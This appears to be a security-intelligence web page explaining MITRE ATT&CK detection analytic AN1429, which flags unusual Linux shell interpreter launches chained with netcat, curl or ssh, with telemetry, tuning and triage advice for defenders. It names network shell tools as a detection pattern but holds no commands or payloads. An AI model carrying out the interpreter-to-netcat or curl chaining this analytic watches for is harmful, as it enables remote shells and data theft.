AN1429: Analytic 1429
Detects use of shell interpreters (e.g., bash, sh, python, perl) initiated by users or processes not normally executing them, especially when chaining suspicious utilities like netcat, curl, or ssh.
Analyst context for executives and security teams
AN1429 is a Linux detection analytic focused on unusual launches of shell interpreters such as bash, sh, python, or perl, especially when paired with utilities like netcat, curl, or ssh. For leaders, the value is that unexpected shell activity is often a decision point in investigations: it can indicate automation, administration, or potentially unauthorized command execution. The business question is whether the organization can distinguish normal Linux operations from abnormal shell-driven behavior quickly enough to support incident response and continuity decisions.
Executive priority
Prioritize this analytic where Linux systems support critical applications, cloud workloads, administrative tooling, or regulated services. Executives should ask whether SOC teams have enough Linux process telemetry to prove who or what started a shell, whether that behavior is normal for the host or user, and whether suspicious chaining to network utilities is reviewed. This is also useful audit evidence for monitoring coverage, but the supplied ATT&CK object does not define a specific tactic, technique, or mitigation outcome.
Technical view
Validate detection logic for Linux process execution where shell interpreters are initiated by users or parent processes that do not normally execute them. Focus triage on parent-child process relationships, command lines, initiating user context, host role, and chaining involving utilities named in the analytic description: netcat, curl, or ssh. Because no official detection logic is provided, teams should build environment-specific baselines for expected shell use by administrators, service accounts, automation, package management, and application runtime behavior before treating matches as high confidence.
Likely telemetry
- Linux process creation events
- Command-line arguments for shell interpreters and related utilities
- Parent-child process lineage
- User and service account context
- Host identity, role, and workload context
Detection direction
- Confirm telemetry captures Linux process starts with full command line, parent process, user, and host context.
- Baseline normal shell interpreter usage by host role, user group, service account, scheduled task, and automation framework.
- Tune for uncommon parent processes launching bash, sh, python, or perl, rather than alerting on all shell execution.
- Increase priority when shell interpreter execution is chained with netcat, curl, or ssh, while accounting for legitimate administration and deployment workflows.
- Review false positives from system maintenance, scripts, configuration management, developer activity, backup jobs, and application startup scripts.
Mitigation priorities
- Ensure Linux endpoint or workload monitoring collects process execution, command line, user, and parent process metadata.
- Define approved administrative and automation patterns for shell interpreter use on critical Linux systems.
- Reduce unnecessary shell access for service accounts and users where operationally feasible.
- Review and document legitimate use cases for network utilities such as netcat, curl, and ssh on monitored hosts.
- Use alert triage procedures that require validation of user intent, parent process legitimacy, host role, and network activity before escalation.
Analyst notes and limits
This object is a detection analytic, not a full ATT&CK technique. The strongest defensible interpretation is behavioral: unusual Linux shell interpreter execution by unexpected users or processes, especially with suspicious utility chaining. The supplied object provides no relationship context, no tactic mapping, and no official detection query, so local baselining is essential.
The official detection field is not provided, tactics are not specified, and no relationships are supplied. This take cannot infer adversary attribution, active exploitation, impact, or guaranteed detection coverage. Applicability is limited to the supplied platform: Linux.
Analytic 1429
Detects use of shell interpreters (e.g., bash, sh, python, perl) initiated by users or processes not normally executing them, especially when chaining suspicious utilities like netcat, curl, or ssh.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | b0ac28394f95… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack AN1429Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.